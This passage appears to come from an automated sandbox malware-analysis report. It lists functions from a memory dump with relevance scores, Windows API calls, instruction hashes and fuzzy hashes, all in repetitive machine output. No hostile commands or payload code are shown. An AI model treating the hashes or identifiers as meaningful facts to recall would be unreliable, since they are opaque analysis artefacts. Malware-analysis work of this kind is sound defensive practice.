              • Opcode Fuzzy Hash: 5ce9e86f3c576be94128be578a5bbe0ec1636d679a03a70b53984d5be0fd9c74
              • Instruction Fuzzy Hash: F031C6759012299BCB61DF28D88879CB7F8AF08710F5041EAE81CA7250EB749F858F44
              Function 00BAAAA8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID: .
              • API String ID: 0-248832578
              • Opcode ID: 7cc239b66b3a27399dd333c92d5497b76b3f93872373b0b539edd432ee6f4dd6
              • Instruction ID: 5e2ded2899e2c1ae915c017d9837020d59ca733d3c539a3aef6b66df5bd3868d
              • Opcode Fuzzy Hash: 7cc239b66b3a27399dd333c92d5497b76b3f93872373b0b539edd432ee6f4dd6
              • Instruction Fuzzy Hash: B631C1719042096BDB249E79CC84EEABBEEDB86314F1401E8E51997251EA309D44CB70
              Function 00BACB60 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
              • Instruction ID: 92b6a20beec81f6b1e224bacc323cf49cfa19ffe5eb42e7cb37f1eb3f724a733
              • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
              • Instruction Fuzzy Hash: 93024D71E042199FDF14CFA9C8806ADBBF1EF89314F2581AAD819E7384D731AD458B84
              Function 00B9A63C Relevance: 3.0, APIs: 2, Instructions: 46COMMON
              Download Yara Rule
              APIs
              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00B9A662
              • GetNumberFormatW.KERNEL32(00000400,00000000,?,00BBE600,?,?), ref: 00B9A6B1
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: FormatInfoLocaleNumber
              • String ID:
              • API String ID: 2169056816-0
              • Opcode ID: fcb0a2e73855cf6def59d20f1de95c9ea55b897814be78d7611a770893fe8a16
              • Instruction ID: 8c437f4d48eb1e2fac59d8e70bfbbe48d3e77e906be273a79b48d94fbf743e92
              • Opcode Fuzzy Hash: fcb0a2e73855cf6def59d20f1de95c9ea55b897814be78d7611a770893fe8a16
              • Instruction Fuzzy Hash: 6E019E36510208BFDB109F64DC05FABB7FCEF08710F005562FA15A7160E7B0AA1487A9
              Function 00B86EC9 Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON
              Download Yara Rule
              APIs
              • GetLastError.KERNEL32(00B9117C,?,00000200), ref: 00B86EC9
              • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00B86EEA
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ErrorFormatLastMessage
              • String ID:
              • API String ID: 3479602957-0
              • Opcode ID: a5c7d5cf33940c017996d58b065f22d7b4f94764a36febd3b50740689a457510
              • Instruction ID: d5861c610a03aabe9e49a02ff51dc69e5aa57ed8c09618e2cf4482d32fd3d630
              • Opcode Fuzzy Hash: a5c7d5cf33940c017996d58b065f22d7b4f94764a36febd3b50740689a457510
              • Instruction Fuzzy Hash: 4AD0C7353C8306BFEA112A74CC15F277BD4AB55F43F108654B356DD0E0C9B09014D715
              Function 00BB1194 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00BB118F,?,?,00000008,?,?,00BB0E2F,00000000), ref: 00BB13C1
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ExceptionRaise
              • String ID:
              • API String ID: 3997070919-0
              • Opcode ID: fe4d4e92c948721fcacc91a4821db03bbaee5cddd5140e09cbabdb7acf5b7b35
              • Instruction ID: 22c6cde1734e175c40fe7a0bc06370a85b425dec0b17caaeb82d54433bfaff34
              • Opcode Fuzzy Hash: fe4d4e92c948721fcacc91a4821db03bbaee5cddd5140e09cbabdb7acf5b7b35
              • Instruction Fuzzy Hash: A8B15B71610608DFD719CF2CC49ABA57BE0FF45364F698A98E899CF2A1C375E981CB40
              Function 00B8407E Relevance: 1.6, Strings: 1, Instructions: 332COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID: gj
              • API String ID: 0-4203073231
              • Opcode ID: fccb35d173a25239c1a2550c921d0414ea8a1c448d62756c58d1819376e85bc3
              • Instruction ID: 33e99b380095c40c0765b63b2dd10deddeae1927b9ed03c40acfaa469a4987d5
              • Opcode Fuzzy Hash: fccb35d173a25239c1a2550c921d0414ea8a1c448d62756c58d1819376e85bc3
              • Instruction Fuzzy Hash: 58F1D2B1A083418FC348CF29D880A1AFBE1BFCC608F19892EF599D7711E774E9558B56
              Function 00B8ACF5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
              Download Yara Rule
              APIs
              • GetVersionExW.KERNEL32(?), ref: 00B8AD1A
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: Version
              • String ID:
              • API String ID: 1889659487-0
              • Opcode ID: cb1860153e331ea95495a31fc9501af3cb1d19f962387c39cc49e9a4327de275
              • Instruction ID: 8fd056635e04b6a46699577bdb23300ad157353fc58b7bc8528c56727b6b5b26
              • Opcode Fuzzy Hash: cb1860153e331ea95495a31fc9501af3cb1d19f962387c39cc49e9a4327de275
              • Instruction Fuzzy Hash: D8F01DB090020CCBD728EF18EC82AE973F5F758711F2002AAD91583764DBB0AD80CF91
              Function 00B9F063 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
              Download Yara Rule
              APIs
              • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,00B9EAC5), ref: 00B9F068
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled
              • String ID:
              • API String ID: 3192549508-0
              • Opcode ID: 3525d425e25a6da656529ed6c9558e2ad3673f1bdf98dadd06f60c2792f8bfad
              • Instruction ID: 15fbfee7109e1c98b5804249232b86d5b5eff769524f276a72526979a1a36d89
              • Opcode Fuzzy Hash: 3525d425e25a6da656529ed6c9558e2ad3673f1bdf98dadd06f60c2792f8bfad
              • Instruction Fuzzy Hash:
              Function 00BAB710 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: HeapProcess
              • String ID:
              • API String ID: 54951025-0
              • Opcode ID: 79b7b5ff89fce0a2996e49fd84334787d0e13dc1e4fb7913387419381bf27024
              • Instruction ID: 5cd629cbbe6dd6ceb593cd215459868f1aa6af66f520d0b58f030b99bbe8446d
              • Opcode Fuzzy Hash: 79b7b5ff89fce0a2996e49fd84334787d0e13dc1e4fb7913387419381bf27024
              • Instruction Fuzzy Hash: B7A011B02002008F8300CF3AAE083083AECAA00A803088328A008CB020EE3082208F00
              Function 00B95C77 Relevance: .8, Instructions: 800COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
              • Instruction ID: 67601efc947f18318516f4a4af591d7f6f91f5a4b6d846e07e1bbadb8cacfe3f
              • Opcode Fuzzy Hash: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
              • Instruction Fuzzy Hash: 2362E671604B899FCF2ACF38C990AB9BBE1EF55304F0485BDD89A8B346D634E945DB10
              Function 00B970BF Relevance: .8, Instructions: 773COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
              • Instruction ID: c71e659438421f21a97f25fcdc57d75e8c5f0929b76735ea489eaf82cc43421a
              • Opcode Fuzzy Hash: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
              • Instruction Fuzzy Hash: F46203706687469FCB19CF28C880AB9BBE1FF55304F1486BED89687742DB30E955CB90
              Function 00B8ED14 Relevance: .7, Instructions: 694COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
              • Instruction ID: 97cd2f6d4462f49f37247ae81bb7ab34f6555c7895e5955a521e3952226ad7db
              • Opcode Fuzzy Hash: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
              • Instruction Fuzzy Hash: 06523AB26087018FC718CF19C891A6AF7E1FFCC304F498A2DE98597255D734EA59CB86
              Function 00B96A7B Relevance: .5, Instructions: 509COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9f739e181572e7169dec6e5f74f0113ebfd4cd5667af972ee7a8f27d3f250614
              • Instruction ID: cfb69b42e8f00eeaed2ac725814b405954898706eb1a53871188eab18c8a580e
              • Opcode Fuzzy Hash: 9f739e181572e7169dec6e5f74f0113ebfd4cd5667af972ee7a8f27d3f250614
              • Instruction Fuzzy Hash: 6C12BEB16147068BCB28DF28C9D06B9B3E0FF54308F14897EE597C7A81E774A895CB45
              Function 00B8BE13 Relevance: .4, Instructions: 449COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2029f5cfca7f94b7439a5641b7c90153dd219808acc4cdb91ccdf08fb895fb70
              • Instruction ID: 9e791e24816d1127dd0410864d32a3bcd17e61ae973ab06b203414642c385fee
              • Opcode Fuzzy Hash: 2029f5cfca7f94b7439a5641b7c90153dd219808acc4cdb91ccdf08fb895fb70
              • Instruction Fuzzy Hash: 01F190B16083018FC718EF29C48496EBBE1EFC9354F148AAEF4D597261D734E906CB66
              Function 00BA0B43 Relevance: .3, Instructions: 345COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
              • Instruction ID: 2637f0562f9606c2a4da41a4ea31ab632d1bc869daf5152ed3601d087c58a636
              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
              • Instruction Fuzzy Hash: 32C1843622D1930ADF2D5A39857453FBAE1DAA37B1B1A07EDD4B2CB1C4FE20D924D520
              Function 00BA0F78 Relevance: .3, Instructions: 341COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
              • Instruction ID: 1efb405e377a13dee62139ab838d2d9c7a8677ec31237de058cde9921494cc24
              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
              • Instruction Fuzzy Hash: 1DC1733621D1930ADF6D4A3D857453FBAE1DAA37B171A0BEDD4B2CB1C4FE20D9249620
              Function 00BA070E Relevance: .3, Instructions: 331COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
              • Instruction ID: 7763e13dceb4ad02e8f5c98988851266d8150b8a9845e08dbf6343a87453ca2e
              • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
              • Instruction Fuzzy Hash: C7C1933622D1930ADF2D5639C57443FBAE19AA37B171A07EDD4B2CB1C5FE20D924DA20
              Function 00B96646 Relevance: .3, Instructions: 325COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 468fc6c1b17626a3aa500faa91954ce5db22646cd83729aadec68836f774db87
              • Instruction ID: 41950ecc3faca5f4640c03678da97ce316ca1ec35b73e742a1cdb049c6dc85a8
              • Opcode Fuzzy Hash: 468fc6c1b17626a3aa500faa91954ce5db22646cd83729aadec68836f774db87
              • Instruction Fuzzy Hash: 76D1D2B1A083458FDF14DF69C880B5ABBE0EF95308F0445BDE8849B642D734E959CB9A
              Function 00BA02F6 Relevance: .3, Instructions: 323COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
              • Instruction ID: fb204b54852136d225a0f52db23ac4ab7f94b2cc46ba682fdb85bc7f3d8534e3
              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
              • Instruction Fuzzy Hash: CDC1943622D1530ADF2D5A39857443FBAE19AA37B171A07EDD4B3CB1C5FE20D924DA20
              Function 00B8E2A0 Relevance: .3, Instructions: 318COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
